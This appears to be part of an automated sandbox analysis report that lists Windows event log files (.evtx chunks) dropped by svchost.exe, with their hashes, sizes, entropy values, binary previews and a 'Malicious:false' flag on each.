                                      SSDEEP:384:rhr8R87L8lu8ud8y8Ce8ul8q8Mb8uu8ZTl8LL8uT8ii8s2u8u28F8WB8uGC8o86h:rbbIRCyv9YrOyUwvhZ51p0Da
                                      MD5:C647B6E8EEF0EDADC3702A934A4E4904
                                      SHA1:1BB2DDD55319DA96F787AE1688E75D32E677A4E6
                                      SHA-256:C395536BF3BAFE9AC5092408B71D50224E87C5DD4AB96BD9A159ED92D36CDDF5
                                      SHA-512:3FBDB1C4B4E065B5DA1143B1B1FB33B188006558D76AD5543D196CABCB32D5A7BFC81EE9995E5DAFC735D593619B0EC12573993D09037AF83BE6D3DCB1107551
                                      Malicious:false
                                      Preview:ElfChnk.........:...............:............k...l..F|.......................................................................[.........................................V...=...........................................................................................................................f...............?...........................m...................M...F....................6..&...........................................................................................................................**..@................,............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):0.9737054121668913
                                      Encrypted:false
                                      SSDEEP:384:hhBvCvPMvBUzvHxv+vXvqvHv8vSvevNvovDvuvlHvYvIv54vJvjvNv:hL/
                                      MD5:28B2EECBFF645319E0755E0AFC203CDF
                                      SHA1:3EADA3FD3ED18D6F953EEEECEDBA7D695C4FB017
                                      SHA-256:09F8E0E7A4D50D78C663194E64768E14D4F296A60F51BB07389AB8F2FEFA0D6E
                                      SHA-512:9CB6731E41A3D396ED09A7E64B748C47F1C2945C1AE1D0A25D2B3B8D3CFE676FDDC3CCD3C6DF054BB7FAE07A4D6CC09DC9AC2A9DA101C5B3B3F7A0B7D0F2966B
                                      Malicious:false
                                      Preview:ElfChnk......................................,...-..9y.]....................................................................>...................v...........................=...........................................................................................................................f...............?...........................m...................M...F.......................&...........................................O...............................................................................**...............Z1..,............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):3.7447306595168834
                                      Encrypted:false
                                      SSDEEP:384:ZhAuVuouhuhudnuBupuVuauPu7uMuVx7/bl0Ad5h51GR5GfGtGpuWGaG0uWGKb8:ZKP7/p0Ad5hqq+4cnrVnKA
                                      MD5:372A93BFB58AE7428C6D2ABEB21151B5
                                      SHA1:8CBCFEC17135DB0381403A6E20024CA6D2210AA1
                                      SHA-256:FB39E76767959088EAA5011FF358E1921B0A76E0469F5A6B7FBA9EA022B8F075
                                      SHA-512:CDD09BA3628753BA20AEF7823057E6334E6FB2FA2955D832818ED451B02EB12F6BEA3FBBCC2D30502F6A9EB3383833B821977B7C9AEF47BB9E2AFD948B3557B5
                                      Malicious:false
                                      Preview:ElfChnk.........................................X.....z......................................................................_7.................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F.......................&...........................................................................................................................**...............X...,............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):2.208184281139527
                                      Encrypted:false
                                      SSDEEP:768:kVwsJrwgecf/geR1ePQedVeUkeMDceQ5eMBetePeqjVyehelCeJeNeeJeQke0:U
                                      MD5:031AE23C7E40A59438D0F127BB980EC0
                                      SHA1:19C89B301B5DEAFCA7F4C8EC7ED35E893A0A3689
                                      SHA-256:0453BBC98CFF7CAF021AB84D097CA92099651D54C308D51B5F426F67E02BF55A
                                      SHA-512:FE02365930C43201A8A0188EC7463A9D89186F952E91D2E8E750A86811ED2E8C553DEB4E0D71BDA2D9EF10F9AAAFAFD0D32C08947E7617921D7207793DB4B16A
                                      Malicious:false
                                      Preview:ElfChnk.........9...............9............n...q..}.1......................................................................*..................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F...................................................................................&...........*.......]...........................................**................P.,..........}.&.........}..T.NN.y..C........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):608744
                                      Entropy (8bit):4.157124122583925
                                      Encrypted:false
                                      SSDEEP:1536:cFXvrYIcKWPh+zbjzj7bjPz3P3aQqLjyXniC7sTX:cFTYIJWPh+zbjzj7bjPz3P3bKSiqa
                                      MD5:AE06158AC53E33CCFFB9DDB47BA50855
                                      SHA1:11EFF832798CD0D93D5221B4A0C310C6F64D2C38
                                      SHA-256:2897BFCA0BC0736C7FC084FDC3408067F574FC7FF883F1DFE1AC38385B3D56A2
                                      SHA-512:0E57E562AFE9A7DB2B3854923AD53C6C9A2CB710CB0CE23E8EA0ABD3C3B62447DC84713B987CE622E6EF587FC7E326AD467DB1E6B5F09613C995FBA857A066C5
                                      Malicious:false
                                      Preview:ElfChnk..4.......4.......4.......4...................U......................................................................'Z..................T.......................|...=...........................................................................................................................f...............?...........................m...................M...F.......................&...........................................................................-...............................................**..(....4.......B.!..............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):4.311845408807394
                                      Encrypted:false
                                      SSDEEP:384:+gh+CD0CtCGChCrC/CeC/C6CzCeC8CrC+CRCLCwCsOCCCSCFCYCUCE2l2m2L2s2G:+g5d26OYNpgwHXx
                                      MD5:4FD9B16A4ED1A54503AF195246728D09
                                      SHA1:6294E15F46CBF21A8450E608626E76F6A95F1B89
                                      SHA-256:D62EB98BFC983EC7C3CC52668AE4499928D75F803A1F83D9BF98E9B738F39370
                                      SHA-512:BC967784FB0DA2B58F0C8A92E04F8FC4B92DFE903B49E561CA822528296EDBFE8185C4212D29BADBD670B3C3A7006B5391E3C94E99DB7916918109641FD04615
                                      Malicious:false
                                      Preview:ElfChnk.d.......{.......d.......{...........H>...?....jI........................................................................................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F.......................&...........................................................................................................................**..0...d.......k%(~.{............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):1.0662136356590293
                                      Encrypted:false
                                      SSDEEP:384:ZhaK7BnoPK7BkK7Be6K7BXK7Bm9K7BLK7BYTK7BbK7B5uK7BTK7BBK7BAK7BfhKd:ZRRHG+DSrizC0XtmkwjxrN
                                      MD5:F74FD01FC8EB1D88C35796986A301E83
                                      SHA1:087D0E5BA3B0CCF149C55ED6454F56B49AEAF093
                                      SHA-256:F63B346C1BF1AE6C797CE5AF0B87B9D00F2E9818C6F6511E27F2747FCB3B88F6
                                      SHA-512:83AE9DC6C62D4C76ACC5CADDD8811450FDD24CB950F2DFC963465A459EAE84A1E67AA8EF9042D531D640D31D7BE086DB9D9C767D55D08DC5B5E01361883B9FFE
                                      Malicious:false
                                      Preview:ElfChnk..................................... -......md......................................................................7.(|................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...................................................................................................................................................**..............f..."-............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):4.423592768728116
                                      Encrypted:false
                                      SSDEEP:1536:9iEjRZxfK3r7ML8BFA8vVdih34RWyfGtZBAQ5OyaKvl9rHaBlZRVjBxCu+s9o5N+:9iEjRZxS3r7ML8BFA8vVdih34RWyfGt4
                                      MD5:AA45EFCC3AB7AD78D6576D80F50D8FD8
                                      SHA1:2155B7659C4391A755413E1AB43CFBB533AB3B7F
                                      SHA-256:2E74D99BA7B6054C45541CF276E92F3E952A379B58A3502C48CE3B9626C9B2C2
                                      SHA-512:8275C6F8E25CBCBB28ACAA3101DDD1AC3001C128879F4CE7ED3AB870C6F7DC5E06BDC81033E92791F5BC9C1022947A8A7164529C8EA4F78DE678A97358853466
                                      Malicious:false
                                      Preview:ElfChnk.........H...............H...............`...0......................................................................."W..................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F.......................&........................................................................................@...'...................%..........**..@...........zh................&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):3.905630419870268
                                      Encrypted:false
                                      SSDEEP:768:uL8ACsRoU7keghU0fXaE79QRbdnmp/rN4yJDmOYARrir15Pp9zGwuSMO4BN1hfxx:7r5xeqh
                                      MD5:77734C2F5E96AA983ECAFE88A0A1F371
                                      SHA1:F85E939D1679B4CC1DE1885C316E01FE2A1C2AB6
                                      SHA-256:D8109DC24970E5692F2A6D9D6D0ADB3837A95623450A6287DE7C1321E265CEB4
                                      SHA-512:2BD006B2409BE5D51BA88AAEBB02F5FA6A0AC788B1F03E312CF6D62DED5A837B8AC2ADF05E4EC0A795ECE64CBADC071B3202E00146C4B25247B834B1F6ABB6C0
                                      Malicious:false
                                      Preview:ElfChnk.........#...............#...........`...0......@.......................................................................b............................................=...........................................................................................................................f...............?...........................m...................M...F....................9..%b...j......................................ed..........5h.......................6.............5m..........................**..X.............?.!-............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):2.665127487657689
                                      Encrypted:false
                                      SSDEEP:384:sh0u1uguEue2uxuuuHQuYou/TuHQquHhuH7uOuNuiuauhuHnuHXuLu4uHSZu8uDi:sxYxEg4aNKHwtXZQyF0PI4QaBh
                                      MD5:97E739C7EF97322E26C43672183BEB87
                                      SHA1:01AD80FF231309EE0A8495DE412F63F05DD1A358
                                      SHA-256:D5E540FB81B224DAD7F5EA1FBF01610F7D90921D5F083138AFAE3F8E59BEC44A
                                      SHA-512:C8C233110EFADA01E2E4A7895EA58D4DF7207722545A55A612452AA27CE75596D9854AC900539AE86D0AAAA15D34CF0DB0202CAD92A6B4CC379BA93722C45293
                                      Malicious:false
                                      Preview:ElfChnk.........L...............L...............P....p......................................................................3.Lv................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F............................]...A..............................................we...................>..................................&...........**...............O.P.,.........r .&........r ..61Q;..x{..f........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):0.6946674006619171
                                      Encrypted:false
                                      SSDEEP:384:7hpALAdu/ZAxuwSAQAjqAtcAtyGANpA7A:7Vu/WFy
                                      MD5:CAACCB19E6BA79A513A78F4CDAB8B074
                                      SHA1:45C878074FFA87A33C0CA36921E99D17750CB68A
                                      SHA-256:BE8316CD4CBEA47A599E5375DA6979D5D6934DEFCC0EF5EBC42486C70E324113
                                      SHA-512:68CF71A2E64FFF8AD239CDBFAEB5EFBDAF8CDD555AD5B3927FA400FB0E5DCF9448E6FE7DEFA9D0BEDEDBF82CCEA2CBE4385C88538EA239FDA61B91551720D03F
                                      Malicious:false
                                      Preview:ElfChnk...............................................3r.....................................................................m_.................B.......................j...=...........................................................................................................................f...............?...........................m...................M...F.......................&.......e.......M...............................E...................................................................%.......**..P.............?...............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):3.600944857083945
                                      Encrypted:false
                                      SSDEEP:768:j9Rt6NtN1Z95JZtVdlXTDvPfg4XTnrPD7fbw6GG26CVJdhpt7V19hVR5JRNZl1ln:
                                      MD5:2ABCD283A36954064F45FEC40FC8F012
                                      SHA1:D390A734AE72ACCD6A89D85E1790A6AE6B5F4098
                                      SHA-256:018EFDCEE019E15C86F8C35758CF348E3F2ED5F7EEE651A4983AB8EB3F600F1E
                                      SHA-512:2AC9CD0B0E4BBFD199BD96C77B7A8B93D0CD19AF388BD0E100A9AE12E5C6170DE3EBC69053B1AAD0AD1A73A604A88FA58B926F421D08E3E68B662E7492C48FD0
                                      Malicious:false
                                      Preview:ElfChnk.........j...............j...........P... ...l0........................................................................................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F.......................&...........................................................................................................................**..............N.a.=.............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):68976
                                      Entropy (8bit):4.656966631610031
                                      Encrypted:false
                                      SSDEEP:384:uMO2MEMwGMOkiM/nhgM6NfMYMsMlaMbMKMA2MzMLMnjMV5MuTMiM11MNNMxMFiMJ:RYovcOFjlaDo5S+aTqOI63ka1bY
                                      MD5:C34199314B94EE0BEA57C0A66A9FA42E
                                      SHA1:4013ED30C24562AEEC1A870DA3F58FB5A443205D
                                      SHA-256:B4CCCEDD560C5ED6207AE1E1A030EC0622097227A35182244F3C4413D9D1075B
                                      SHA-512:7761C2D1473C5702CFD2D5E88DE954D9A2937154A25962476489348A43C53F2B183EA6B3EDA0E2967D17900B789F2C2CB057E6BB39E208073B49AE412323D321
                                      Malicious:false
                                      Preview:ElfChnk...............................................cD....................................................................W.+x........................................D...=...........................................................................................................................f...............?...........................m...................M...F.......................&........N......U...............................]...........................................................................**................."..............&.......................................................................F.....!...A.A..............".....U]..\J..x...|. ...H........................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.t.o.r.e..7*...\..C.....M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.t.o.r.e./.O.p.e.r.a.t.i.o.n.a.l.....................I.......I.n.v.o.k.i.n.g. .l.i.c.e.n.s.e. .m.a.n.a.g.e.r. .b.e.c.a.u.s.e. .l.i.c.e.n.s.e./.l.e.a.s.e. .p.o.l.l.i.n.g. .t.i.m.e. .u.p.:. .P.F.N. .M.i.c.r
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):2.2445023289928083
                                      Encrypted:false
                                      SSDEEP:1536:lKlKkKPKhKNK8KZKMKtKAKZKxKtKPKcKlK2KOK8K4KMKpKwKoKEKLKVK5KxKmKGm:lKlKkKPKhKNK8KZKMKtKAKZKxKtKPKck
                                      MD5:4DBEDD8B1F83E96AA3D66C86D18BB596
                                      SHA1:1B8D188A835D73D62CF074ED54F1C28E0452244B
                                      SHA-256:237E5699A115E46545B09BCCDC55D18CBB1FBA3342613BD119E96148FCE13CFD
                                      SHA-512:C5AAB6701438FD6B752B625885D58BCB711E8FDA8D21DD08525468D479D240C9784F7C0DD85756F074E9FE171618AD2E975C0C4639D586620F1B49B83DF2ECDE
                                      Malicious:false
                                      Preview:ElfChnk.........8...............8............p..xr....b......................................................................n..................:...........................=...........................................................................................................................f...............?...........................m...................M...F.......................................................E?..........................................................................................**...............*.P.,.........r .&........r ..61Q;..x{..f........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):1.2584767503070673
                                      Encrypted:false
                                      SSDEEP:384:oheiViXiii3ieiAiAioiXiKiNi4iciHiyigihiFiqiCiwishi4i3iWi:o
                                      MD5:55950B9A9DBBF2E002DFA59B16AAC172
                                      SHA1:C52475DCE560E426DBB06CA26F84578DDD514C43
                                      SHA-256:DF41692DFCEABED3E540CCA07D24756E5AD2C3007D7392B140F3365F00B73624
                                      SHA-512:4490C3CDF7CE5CD7694A0B89CCE0D2D400953DE28E9245148CB602175B2E911421EFE150E953E5C88FC85EFFE6A23D6A45371565BAAD0B6FB28AD9CE97F68C67
                                      Malicious:false
                                      Preview:ElfChnk.w...............w....................<..8>..+.......................................................................%S..............................................=.......................#...................................................................................................f...............?.......................P.......................M...F.......................................&...........................................................................................................**......w............{..........-.&.........-.{CST....M.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):4.236150334313226
                                      Encrypted:false
                                      SSDEEP:768:F5aoffaBahaVatatapala1aEa+aaa0acaaajaraHaYa8a+araDaNa2aFaranaXaY:/fP
                                      MD5:A9D1157400248F26B69127B24B3EBED7
                                      SHA1:4F005F4241A995441E5091C484BFE9DD13EF903A
                                      SHA-256:717529C5719FDF40B141C5A8E937133BD4010BA20C0721939F358D5E5889D51A
                                      SHA-512:E53998EEBE4670568A003BB94E3BC6E483CE2DA63CE87C7C83D492936FC1611D5CF15BFA94DF9392D7B7059B59A3DDC9471BE03204A85314F584573C4745BA2F
                                      Malicious:false
                                      Preview:ElfChnk.Y.......s.......Y.......s............R..XU..+x.B.....................................................................6w.................n...........................=...........................................................................................................................f...............?...........................m...................M...F.......................&.......................................................G...................................................................**..h...Y.......F.Km.............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):2.186757899279565
                                      Encrypted:false
                                      SSDEEP:384:PhkXXXIZXoXfHXhXTXIXHXIXfXNXlCXTXvXKXQXiXnXLXJXvXdXGXoX3XdX2XcXp:PRQJ
                                      MD5:48AF79737C8F3EA5BA0EC3AE52D01335
                                      SHA1:146ED6348061A1232C32D210B1D75DB2C7F3AC7A
                                      SHA-256:9865C59195804F6FE335AAFF273DE8FE09A926F22F29E2E02FD4177221978E24
                                      SHA-512:72C19DF7C968B1099EA5954DA59FC2F2F37841DF746AD68A88DBD1883253983C59C7B6533F67685AFB2F8941899A90E6017D735E73EB3FC58061AF9AE3671101
                                      Malicious:false
                                      Preview:ElfChnk.........)...............)...........Pr...u..&g2q.....................................................................8v`................Z...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................3.......................................&...........**..............`j4P.,.........r .&........r ..61Q;..x{..f........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):4.281469656005786
                                      Encrypted:false
                                      SSDEEP:768:xTtNTbDvefzf3w4/SDEnIQUkwlgz89IrArkG8R:Wy
                                      MD5:A8D0DD9A1601948BC9A8E224A693D6EB
                                      SHA1:4597EF2E5282F67513F5834B85C66DB551B1CA66
                                      SHA-256:E3899E786A7D40152F8C802DEC8733B9783DEDF65578C31E26767B0153CEA2EA
                                      SHA-512:CCE55F3A88DE0DBAA0EA18C8C244A111567176D319604CE0163A80D283E8ECDB2E7ECDD3D022C7056AD5FF11D6140193C51AC0A3980387E036B5605ECD3E2216
                                      Malicious:false
                                      Preview:ElfChnk.}.......~.......}.......~...................X{.A......................................................................,v................X...........................=...........................................................................................................................f...............?...........................m...................M...F.......................&...................k...........................................1...........................................................**......}........................&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):0.9478010062992827
                                      Encrypted:false
                                      SSDEEP:384:GhIw2z72L2e2K2x2j28262j2F2g2q2J2X2U2y2n2l2w2:G4
                                      MD5:9A734815B7976006A98509CAD9A7C61C
                                      SHA1:691C1A3BE82F87526EC0207CD9502E20102EAE8A
                                      SHA-256:38BB165AE5D446E1C70A9717A333D09EFC072F5FE254EC48FDA427585232525E
                                      SHA-512:AC7FA4277BF7E3FBDBFA63E9FBE93FD2C6E9BE2C905E7D6799AD7650DEBD723E9BDB414A5AC839FDD5B420D0451ABB4E016D3C1AD510B5CB18996AE35BDF231E
                                      Malicious:false
                                      Preview:ElfChnk......................................)...*...y.........................................................................................Z...........................=...........................................................................................................................f...............?...........................m...................M...F.......................&.......................................................................................................................3...**..............{oT!.3............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):4728
                                      Entropy (8bit):3.898603220819061
                                      Encrypted:false
                                      SSDEEP:48:MB5WW2HRtill/nV2JfJ4Y9yL9ANJfJjbjyCyVgwJfJjZtHnJfJf4eoo2HRtill/M:ljaV2RFyRyRxfiVfR1HRaei1RFIR1u
                                      MD5:822F33868E0CAC502E8683CDBE875543
                                      SHA1:1AC0BAF5FFAB65D715ED5E6D21679B91E3E674F4
                                      SHA-256:3F7204CAD2D578B05FBD73A1B976D6AC979145FCACD83908700D361CF12BC939
                                      SHA-512:1717547DC8C8177C96A8E2C44FB139F938A49A44D8A5C68E940859A8ED0E355055C3DBF7D35F948557D61520F3A908AF4FEC6E93F62A94E4D260EE53163530CB
                                      Malicious:false
